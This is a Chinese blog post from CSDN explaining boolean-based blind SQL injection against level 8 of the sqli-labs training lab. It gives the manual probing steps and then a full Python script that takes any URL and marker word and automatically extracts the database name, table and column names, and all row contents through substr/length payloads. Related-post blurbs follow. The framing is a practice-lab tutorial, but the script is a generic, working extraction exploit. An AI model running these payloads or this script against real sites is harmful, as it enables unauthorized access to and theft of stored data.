基于python的布尔盲注爆破脚本(sqli-libs第八关)

最新推荐文章于 2024-03-27 21:46:52 发布
最新推荐文章于 2024-03-27 21:46:52 发布
阅读量1.7k 收藏 11
点赞数 4
文章标签: python 数据库 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/henghengzhao_/article/details/127180205
版权

写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破

下面结合sqli-libs第八关来详细说明:

这一关是布尔盲注,布尔盲注用于页面没有回显的情况下,但是心细的同学会发现当我们注入的sql语句正确的时候页面会显示,当出现错误的时候页面是完全不显示的,这个时候也就是出现了两种不同的情况,我们便可以通过这两种情况去猜数据,因此我们也就需要用爆破来解决问题了,本文通过python脚本的方式来爆破,脚本源码放在文章末尾。当然也可以用sqlmap,burpsuite来爆破都是可以的,但是我们不能仅仅依赖别人写好的脚本,还是得自己研究一下布尔盲注的原理的。

  • 老规矩,第一步先判断数据类型

  • and 1=1 和 and1=2来判断

 

  • 我们发现都是正常的,于是可以判断是字符型注入了

  • 下一步开始判断闭合方式,输入单引号和双引号

 

  • 最后判断为单引号闭合,具体判断方法参考往期

  • 下一步判断查询列数

 

  • 依旧是3列

  • 下一步,判断回显位

 

  • 反常的很,我们发现数据并没有回显,这个时候我们就要想起来盲注了

  • 我们输个错误的sql语句试一下看看是不是用布尔盲注可以实现

 

  • 我们发现页面完全没有显示了,说明布尔注入可以一试

  • 下一步,我们上脚本来爆破

#布尔盲注脚本
#为了更加方便的进行布尔盲注,而且省略大部分重复且繁琐的步骤,故写下此脚本
#作者:@hengheng
​
import requests
​
base_url=input('请输入url地址(输入的时候自己加上闭合方式):')
flag_text=input('请输入可判断的标志词:')
​
'''
    爆破思路
1.爆破数据库名的长度
2.爆破数据库名
3.爆破该数据库名下的表的个数
4.爆破该数据库下每张表的长度
5.爆破数据库下每张表的名称
6.爆破某张表下的列的个数
7.爆破某张表下的每个字段的长度
8.爆破每张表下的每个字段的名称
9.爆破每个字段下的每条信息
'''
#全局变量
database_length=0
database_name=''
table_counts=0
table_length=0
table_name=''
column_counts=0
column_length=0
column_name=''
information_counts=0
information_length=0
information_name=''
#获取数据库长度
for i in range(1,50):
    payload = f' and length(database())={i} --+'
    new_url=base_url+payload
    if flag_text in requests.get(new_url).text:
        database_length=i
        break
#获取数据库名称
for i in range(1,database_length+1):
    for m in range(65,123):
        payload=f' and substr(database(),{i},1)=%27{chr(m)}%27 --+'
        new_url=base_url+payload
        if flag_text in requests.get(new_url).text:
            database_name=database_name+chr(m)
            break
#获取数据库下的表的数量
for i in range(1,100):
    payload = f' and (select count(table_name) from information_schema.tables where table_schema=%27security%27)= {i} --+'
    new_url=base_url+payload
    if flag_text in requests.get(new_url).text:
        table_counts=i
        break
# 获取所有的表的长度和名称
for i in range(1,table_counts+1):
    table_name=''
    for m in range(1,50):
        payload=f' and length((select table_name from information_schema.tables where table_schema=%27security%27 limit {i},1))={m} --+'
        new_url=base_url+payload
        if flag_text in requests.get(new_url).text:
            table_length=m
            break
    for m in range(1,table_length+1):
        for n in range(65,123):
            payload=f' and substr((select table_name from information_schema.tables where table_schema=%27security%27 limit {i},1),{m},1)=%27{chr(n)}%27 --+'
            new_url=base_url+payload
            if flag_text in requests.get(new_url).text:
                table_name=table_name+chr(n)
                break
    print(f'表{i}的名称为:'+table_name.lower())
    #在这里知道表名了,直接获取获取表下面的列的数量,长度,以及名称
    for a in range(1,100):
        payload=f' and (select count(column_name) from information_schema.columns where table_name=%27{table_name.lower()}%27 and table_schema=%27security%27)={a} --+'
        new_url=base_url+payload
        if flag_text in requests.get(new_url).text:
            column_counts=a
            break
    #获取各个列的长度以及名称
    for b in range(1,column_counts+1):
        column_name=''
        for c in range(1,50):
            payload = f' and length((select column_name from information_schema.columns where table_name=%27{table_name.lower()}%27 and table_schema=%27security%27 limit {b},1))={c} --+'
            new_url = base_url + payload
            if flag_text in requests.get(new_url).text:
                column_length = c
                break
        #知道了列的长度然后获取名称
        for m in range(1, column_length + 1):
            for n in range(65, 123):
                payload = f' and substr((select column_name from information_schema.columns where table_name=%27{table_name.lower()}%27 and table_schema=%27security%27 limit {b},1),{m},1)=%27{chr(n)}%27 --+'
                new_url = base_url + payload
                if flag_text in requests.get(new_url).text:
                    column_name = column_name + chr(n)
                    break
        #此时知道了当前列名
        print(f'列{b}的名称为:'+column_name.lower())
        # 在这里知道列名了,直接获取获取列下面的数据的数量,长度,以及名称
        for x in range(0, 100):
            payload = f' and (select count({column_name.lower()}) from {table_name.lower()})={x} --+'
            new_url = base_url + payload
            if flag_text in requests.get(new_url).text:
                information_counts = x
                break
        # 获取各个数据的长度以及名称
        for y in range(1, information_counts + 1):
            information_name = ''
            for z in range(1, 50):
                payload = f' and length((select {column_name.lower()} from {table_name.lower()} limit {y},1))={z} --+'
                new_url = base_url + payload
                if flag_text in requests.get(new_url).text:
                    information_length = z
                    break
            # 知道了列的长度然后获取名称
            for j in range(1, information_length + 1):
                for k in range(65, 123):
                    payload = f' and substr((select {column_name.lower()} from {table_name.lower()} limit {y},1),{j},1)=%27{chr(k)}%27 --+'
                    new_url = base_url + payload
                    if flag_text in requests.get(new_url).text:
                        information_name = information_name + chr(k)
                        break
            # 此时知道了当前列名
            print(f'数据{y}的名称为:' + information_name.lower())
​
print('数据库名称为:   '+database_name)
print('该数据库下表的个数:'+str(table_counts))

  • 最终得到所有数据

 

 

henghengzhao_
关注
  • 4
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段中数据。 代码示例靶场:sqli_labs第八实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现,爆的比较慢,仅供参考。
Python】面向Sqli-Labs Less15的布尔盲注二分法脚本
RexHa的博客
11-18 1637
python实现sqli-labs第15post盲注的二分法注入脚本(基于布尔盲注
布尔盲注(ctfhub)
最新发布
2401_82985722的博客
03-27 638
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
CTFHub_技能树_WebSQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写
Ho1aAs‘s Blog
11-19 6288
文章目录前言盲注思路盲注原理盲注常用函数完 前言 布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注就是穷举试错,由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错 盲注思路 由于对数据库的信息了解甚少,盲注需要考虑多种情况,一般思路如下: 爆数据库名长度 根据库名长度爆数据库名 对当前数据库爆数据表数量 根据表数量爆数据表名长度 根据表名长度爆数据表名 对所有数据表爆列数量 根据列数量爆列名长度 根据列
以dvwa为例学习简单sql布尔盲注的详细脚本
Lethe's Blog
03-02 2517
0x01 前置知识 1.SQL注入与SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL盲注: 一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 一般在页面上不会直接显示sql执行的结果 ...
sql注入之布尔盲注-脚本
星空下de青铜
05-05 2892
sql注入之布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了于数据...
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 2878
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
写一个布尔盲注脚本
weixin_35752645的博客
01-01 460
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 838
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
Bool盲注脚本
Forever_Han13的博客
01-21 620
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注布尔盲注,延时型盲注...
python脚本7-爆破woniusales
m0_61786761的博客
09-21 287
【代码】python脚本7-爆破woniusales。
SQL注入布尔盲注
qq_45557130的博客
10-04 726
sql注入布尔盲注
python布尔盲注脚本
kiihuang的博客
03-28 462
使用python,编写一个可以自动爆破布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
SQL盲注python脚本编写
nobugnomoney的博客
05-18 3323
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
哪些数据库可能存在布尔盲注漏洞
07-13
以下是一些常见的数据库,在某些情况下可能存在布尔盲注漏洞: 1. MySQL:MySQL 是一个常见的系型数据库管理系统,它在处理布尔类型的条件语句时可能存在布尔盲注漏洞。 2. PostgreSQL:PostgreSQL 是另一个常见的系型数据库管理系统,它也可能存在布尔盲注漏洞。 3. Microsoft SQL Server:Microsoft SQL Server 是微软的系型数据库管理系统,它在某些情况下也可能存在布尔盲注漏洞。 4. Oracle Database:Oracle Database 是甲骨文公司的系型数据库管理系统,它也可能存在布尔盲注漏洞。 5. SQLite:SQLite 是一种嵌入式数据库引擎,广泛用于移动设备和嵌入式系统中。在某些情况下,SQLite 也可能存在布尔盲注漏洞。 需要注意的是,不同的数据库系统在处理布尔类型的条件语句时可能存在不同的漏洞。此外,是否存在布尔盲注漏洞还取决于具体的应用程序实现和安全配置。因此,在开发和使用数据库时,始终要注意安全性,并采取适当的防护措施来防止布尔盲注安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

henghengzhao_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值